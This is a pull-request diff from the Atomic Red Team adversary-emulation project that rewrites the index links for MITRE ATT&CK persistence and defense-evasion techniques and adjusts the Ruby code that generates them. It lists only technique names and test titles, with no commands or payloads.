Merge pull request #171 from redcanaryco/uppercase-everything
Uppercase all the T's - round two
This commit is contained in:
Brian Beyer
@@ -54,10 +54,10 @@ class AtomicRedTeam
|
||||
|
||||
if File.exists? "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
|
||||
# we have a file for this technique, so link to it's Markdown file
|
||||
"[#{link_display}](#{ROOT_GITHUB_URL}/tree/master/atomics/#{technique_identifier}/#{technique_identifier}.md)"
|
||||
"[#{link_display}](./#{technique_identifier}/#{technique_identifier}.md)"
|
||||
else
|
||||
# we don't have a file for this technique, so link to an edit page
|
||||
"[#{link_display}](#{ROOT_GITHUB_URL}/new/master/atomics/#{technique_identifier}?#{technique_identifier}.md)"
|
||||
"[#{link_display}](#{ROOT_GITHUB_URL}/blob/uppercase-everything/CONTRIBUTIONS.md)"
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
+283
-283
@@ -1,97 +1,97 @@
|
||||
# persistence
|
||||
- [T1156 .bash_profile and .bashrc](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1156?T1156.md)
|
||||
- [T1015 Accessibility Features](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1015?T1015.md)
|
||||
- [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1182?T1182.md)
|
||||
- [T1103 AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1103?T1103.md)
|
||||
- [T1138 Application Shimming](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1138?T1138.md)
|
||||
- [T1131 Authentication Package](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1131?T1131.md)
|
||||
- [T1197 BITS Jobs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1197?T1197.md)
|
||||
- [T1067 Bootkit](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1067?T1067.md)
|
||||
- [T1176 Browser Extensions](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1176/T1176.md)
|
||||
- [T1156 .bash_profile and .bashrc](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1015 Accessibility Features](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1103 AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1138 Application Shimming](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1131 Authentication Package](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1197 BITS Jobs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1067 Bootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1176 Browser Extensions](./T1176/T1176.md)
|
||||
- Atomic Test #1: Chrome (Developer Mode)
|
||||
- Atomic Test #2: Chrome (Chrome Web Store)
|
||||
- Atomic Test #3: Firefox
|
||||
- [T1042 Change Default File Association](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1042?T1042.md)
|
||||
- [T1109 Component Firmware](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1109?T1109.md)
|
||||
- [T1122 Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1122?T1122.md)
|
||||
- [T1136 Create Account](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1136/T1136.md)
|
||||
- [T1042 Change Default File Association](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1109 Component Firmware](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1122 Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1136 Create Account](./T1136/T1136.md)
|
||||
- Atomic Test #1: Create a user account on a Linux system
|
||||
- Atomic Test #2: Create a user account on a MacOS system
|
||||
- [T1038 DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1038?T1038.md)
|
||||
- [T1157 Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1157?T1157.md)
|
||||
- [T1133 External Remote Services](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1133?T1133.md)
|
||||
- [T1044 File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1044?T1044.md)
|
||||
- [T1158 Hidden Files and Directories](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1158/T1158.md)
|
||||
- [T1038 DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1157 Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1133 External Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1044 File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1158 Hidden Files and Directories](./T1158/T1158.md)
|
||||
- Atomic Test #1: Create a hidden file in a hidden directory
|
||||
- [T1179 Hooking](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179/T1179.md)
|
||||
- [T1179 Hooking](./T1179/T1179.md)
|
||||
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages
|
||||
- [T1062 Hypervisor](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1062?T1062.md)
|
||||
- [T1183 Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1183?T1183.md)
|
||||
- [T1215 Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1215?T1215.md)
|
||||
- [T1161 LC_LOAD_DYLIB Addition](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1161?T1161.md)
|
||||
- [T1177 LSASS Driver](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1177?T1177.md)
|
||||
- [T1159 Launch Agent](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1159?T1159.md)
|
||||
- [T1160 Launch Daemon](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1160?T1160.md)
|
||||
- [T1152 Launchctl](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1152?T1152.md)
|
||||
- [T1168 Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1168?T1168.md)
|
||||
- [T1162 Login Item](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1162?T1162.md)
|
||||
- [T1037 Logon Scripts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1037?T1037.md)
|
||||
- [T1031 Modify Existing Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1031?T1031.md)
|
||||
- [T1128 Netsh Helper DLL](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1128?T1128.md)
|
||||
- [T1050 New Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1050?T1050.md)
|
||||
- [T1137 Office Application Startup](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1137?T1137.md)
|
||||
- [T1034 Path Interception](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1034?T1034.md)
|
||||
- [T1150 Plist Modification](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1150?T1150.md)
|
||||
- [T1205 Port Knocking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1205?T1205.md)
|
||||
- [T1013 Port Monitors](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1013?T1013.md)
|
||||
- [T1163 Rc.common](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1163?T1163.md)
|
||||
- [T1164 Re-opened Applications](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1164?T1164.md)
|
||||
- [T1108 Redundant Access](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1108?T1108.md)
|
||||
- [T1060 Registry Run Keys / Start Folder](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1060?T1060.md)
|
||||
- [T1198 SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1198?T1198.md)
|
||||
- [T1053 Scheduled Task](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1053?T1053.md)
|
||||
- [T1180 Screensaver](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1180?T1180.md)
|
||||
- [T1101 Security Support Provider](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1101?T1101.md)
|
||||
- [T1058 Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1058?T1058.md)
|
||||
- [T1023 Shortcut Modification](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1023?T1023.md)
|
||||
- [T1165 Startup Items](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1165?T1165.md)
|
||||
- [T1019 System Firmware](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1019?T1019.md)
|
||||
- [T1209 Time Providers](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1209?T1209.md)
|
||||
- [T1154 Trap](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1154?T1154.md)
|
||||
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1078?T1078.md)
|
||||
- [T1100 Web Shell](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1100?T1100.md)
|
||||
- [T1084 Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1084?T1084.md)
|
||||
- [T1004 Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1004?T1004.md)
|
||||
- [T1062 Hypervisor](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1183 Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1215 Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1161 LC_LOAD_DYLIB Addition](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1177 LSASS Driver](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1159 Launch Agent](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1160 Launch Daemon](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1152 Launchctl](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1168 Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1162 Login Item](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1037 Logon Scripts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1031 Modify Existing Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1128 Netsh Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1050 New Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1137 Office Application Startup](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1034 Path Interception](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1150 Plist Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1205 Port Knocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1013 Port Monitors](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1163 Rc.common](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1164 Re-opened Applications](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1108 Redundant Access](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1060 Registry Run Keys / Start Folder](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1198 SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1053 Scheduled Task](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1180 Screensaver](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1101 Security Support Provider](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1058 Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1023 Shortcut Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1165 Startup Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1019 System Firmware](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1209 Time Providers](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1154 Trap](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1100 Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1084 Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1004 Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
# defense-evasion
|
||||
- [T1134 Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1134?T1134.md)
|
||||
- [T1197 BITS Jobs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1197?T1197.md)
|
||||
- [T1009 Binary Padding](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1009?T1009.md)
|
||||
- [T1088 Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1088?T1088.md)
|
||||
- [T1191 CMSTP](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1191?T1191.md)
|
||||
- [T1146 Clear Command History](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1146/T1146.md)
|
||||
- [T1134 Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1197 BITS Jobs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1009 Binary Padding](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1088 Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1191 CMSTP](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1146 Clear Command History](./T1146/T1146.md)
|
||||
- Atomic Test #1: Clear Bash history (rm)
|
||||
- Atomic Test #2: Clear Bash history (echo)
|
||||
- Atomic Test #3: Clear Bash history (cat dev/null)
|
||||
- Atomic Test #4: Clear Bash history (ln dev/null)
|
||||
- Atomic Test #5: Clear Bash history (truncate)
|
||||
- Atomic Test #6: Clear history of a bunch of shells
|
||||
- [T1116 Code Signing](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1116?T1116.md)
|
||||
- [T1109 Component Firmware](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1109?T1109.md)
|
||||
- [T1122 Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1122?T1122.md)
|
||||
- [T1196 Control Panel Items](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1196?T1196.md)
|
||||
- [T1207 DCShadow](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1207?T1207.md)
|
||||
- [T1038 DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1038?T1038.md)
|
||||
- [T1073 DLL Side-Loading](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1073?T1073.md)
|
||||
- [T1140 Deobfuscate/Decode Files or Information](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1140?T1140.md)
|
||||
- [T1089 Disabling Security Tools](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1089/T1089.md)
|
||||
- [T1116 Code Signing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1109 Component Firmware](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1122 Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1196 Control Panel Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1207 DCShadow](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1038 DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1073 DLL Side-Loading](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1140 Deobfuscate/Decode Files or Information](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1089 Disabling Security Tools](./T1089/T1089.md)
|
||||
- Atomic Test #1: Disable iptables firewall
|
||||
- Atomic Test #2: Disable syslog
|
||||
- Atomic Test #3: Disable Cb Response
|
||||
- Atomic Test #4: Disable SELinux
|
||||
- [T1211 Exploitation for Defense Evasion](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1211?T1211.md)
|
||||
- [T1181 Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1181?T1181.md)
|
||||
- [T1107 File Deletion](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1107/T1107.md)
|
||||
- [T1211 Exploitation for Defense Evasion](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1181 Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1107 File Deletion](./T1107/T1107.md)
|
||||
- Atomic Test #1: Victim configuration
|
||||
- Atomic Test #2: Delete a single file
|
||||
- Atomic Test #3: Delete an entire folder
|
||||
@@ -105,280 +105,280 @@
|
||||
- Atomic Test #11: Delete VSS - wmic
|
||||
- Atomic Test #12: bcdedit
|
||||
- Atomic Test #13: wbadmin
|
||||
- [T1006 File System Logical Offsets](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1006?T1006.md)
|
||||
- [T1144 Gatekeeper Bypass](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1144?T1144.md)
|
||||
- [T1148 HISTCONTROL](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1148/T1148.md)
|
||||
- [T1158 Hidden Files and Directories](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1158/T1158.md)
|
||||
- [T1006 File System Logical Offsets](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1144 Gatekeeper Bypass](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1148 HISTCONTROL](./T1148/T1148.md)
|
||||
- [T1158 Hidden Files and Directories](./T1158/T1158.md)
|
||||
- Atomic Test #1: Create a hidden file in a hidden directory
|
||||
- [T1147 Hidden Users](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1147?T1147.md)
|
||||
- [T1143 Hidden Window](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1143?T1143.md)
|
||||
- [T1183 Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1183?T1183.md)
|
||||
- [T1054 Indicator Blocking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1054?T1054.md)
|
||||
- [T1066 Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1066?T1066.md)
|
||||
- [T1070 Indicator Removal on Host](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1070?T1070.md)
|
||||
- [T1202 Indirect Command Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1202?T1202.md)
|
||||
- [T1130 Install Root Certificate](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1130/T1130.md)
|
||||
- [T1147 Hidden Users](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1143 Hidden Window](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1183 Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1054 Indicator Blocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1066 Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1070 Indicator Removal on Host](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1202 Indirect Command Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1130 Install Root Certificate](./T1130/T1130.md)
|
||||
- Atomic Test #1: Install root CA on CentOS/RHEL
|
||||
- [T1118 InstallUtil](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1118/T1118.md)
|
||||
- [T1118 InstallUtil](./T1118/T1118.md)
|
||||
- Atomic Test #1: InstallUtil uninstall method call
|
||||
- [T1149 LC_MAIN Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1149?T1149.md)
|
||||
- [T1152 Launchctl](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1152?T1152.md)
|
||||
- [T1036 Masquerading](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1036?T1036.md)
|
||||
- [T1112 Modify Registry](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1112?T1112.md)
|
||||
- [T1170 Mshta](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1170/T1170.md)
|
||||
- [T1149 LC_MAIN Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1152 Launchctl](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1036 Masquerading](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1112 Modify Registry](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1170 Mshta](./T1170/T1170.md)
|
||||
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
|
||||
- [T1096 NTFS File Attributes](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1096?T1096.md)
|
||||
- [T1126 Network Share Connection Removal](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1126?T1126.md)
|
||||
- [T1027 Obfuscated Files or Information](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1027?T1027.md)
|
||||
- [T1150 Plist Modification](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1150?T1150.md)
|
||||
- [T1205 Port Knocking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1205?T1205.md)
|
||||
- [T1186 Process Doppelgänging](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1186?T1186.md)
|
||||
- [T1093 Process Hollowing](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1093?T1093.md)
|
||||
- [T1055 Process Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1055?T1055.md)
|
||||
- [T1108 Redundant Access](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1108?T1108.md)
|
||||
- [T1121 Regsvcs/Regasm](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1121/T1121.md)
|
||||
- [T1096 NTFS File Attributes](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1126 Network Share Connection Removal](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1027 Obfuscated Files or Information](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1150 Plist Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1205 Port Knocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1186 Process Doppelgänging](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1093 Process Hollowing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1055 Process Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1108 Redundant Access](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
|
||||
- Atomic Test #1: Regasm Uninstall Method Call Test
|
||||
- Atomic Test #2: Regsvs Uninstall Method Call Test
|
||||
- [T1117 Regsvr32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1117/T1117.md)
|
||||
- [T1117 Regsvr32](./T1117/T1117.md)
|
||||
- Atomic Test #1: Regsvr32 local COM scriptlet execution
|
||||
- Atomic Test #2: Regsvr32 remote COM scriptlet execution
|
||||
- Atomic Test #3: Regsvr32 local DLL execution
|
||||
- [T1014 Rootkit](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1014?T1014.md)
|
||||
- [T1085 Rundll32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1085/T1085.md)
|
||||
- [T1014 Rootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1085 Rundll32](./T1085/T1085.md)
|
||||
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject
|
||||
- [T1198 SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1198?T1198.md)
|
||||
- [T1064 Scripting](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1064?T1064.md)
|
||||
- [T1218 Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1218?T1218.md)
|
||||
- [T1216 Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1216?T1216.md)
|
||||
- [T1045 Software Packing](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1045?T1045.md)
|
||||
- [T1151 Space after Filename](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1151?T1151.md)
|
||||
- [T1099 Timestomp](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1099/T1099.md)
|
||||
- [T1198 SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1064 Scripting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1218 Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1216 Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
